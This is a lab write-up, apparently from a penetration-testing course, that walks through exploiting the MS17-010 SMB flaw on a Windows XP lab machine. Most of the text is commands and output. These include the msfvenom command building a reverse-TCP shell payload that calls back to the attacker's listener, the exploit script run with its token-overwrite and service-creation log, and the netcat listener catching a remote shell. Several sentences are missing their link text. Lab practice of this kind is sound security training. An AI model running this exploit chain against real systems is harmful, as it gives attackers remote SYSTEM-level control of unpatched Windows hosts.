Oh well. After spending several hours Googling and trying out (check out references at end of post) exploits (namely 40279.py, 41987.py, 43980.rb, eternalblue_exploit7.py) I found one that works. Get the . In the exploit script it says:
Tested on:
– Windows 2016 x64
– Windows 10 Pro Build 10240 x64
– Windows 2012 R2 x64
– Windows 8.1 x64
– Windows 2008 R2 SP1 x64
– Windows 7 SP1 x64
– Windows 2008 SP1 x64
– Windows 2003 R2 SP2 x64
– Windows XP SP2 x64
– Windows 8.1 x86
– Windows 7 SP1 x86
– Windows 2008 SP1 x86
– Windows 2003 SP2 x86
– Windows XP SP3 x86
– Windows 2000 SP4 x86
Hooray. Now before running that script we need a couple of other things. You need a working version of . Git clone the repository, then run pip install . in the directory. Incidentally, impacket also allows you to run smbserver.py a script which lets you , a pain given that netcat isn’t a Windows thing.
You also need one more pre-req for the exploit. Get mysmb.py , save to the same directory as the exploit. If not when running the exploit you’ll encounter
root@Kali:~/PTP/2.5_Exploitation/Lab 4# python send_and_execute.py 192.168.1.207 ms17-010.exe
Traceback (most recent call last):
File "send_and_execute.py", line 3, in
from mysmb import MYSMB
ImportError: No module named mysmb
Note the ms17-010.exe is the payload which we generate with msfvenom:
root@Kali:~/PTP/2.5_Exploitation/Lab 4# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.73 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: ms17-010.exe
With the above, I specified the reverse listener at TCP 443, x86 architecture, Windows platform. Ok time to fire the exploit, after we set up the listener.
root@Kali:~/PTP/2.5_Exploitation/Lab 4# python send_and_execute.py 192.168.1.207 ms17-010.exe
Trying to connect to 192.168.1.207:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x89ee6a88
SESSION: 0xe24add20
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe1efcf10
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe1efcfb0
overwriting token UserAndGroups
Sending file EF6I56.exe...
Opening SVCManager on 192.168.1.207.....
Creating service XQBG.....
Starting service XQBG.....
The NETBIOS connection with the remote host timed out.
Removing service XQBG.....
ServiceExec Error on: 192.168.1.207
nca_s_proto_error
Done
If successful we get a shell at our listener:
root@Kali:~/PTP/2.5_Exploitation/Lab 4# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.1.73] from (UNKNOWN) [192.168.1.207] 1129
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.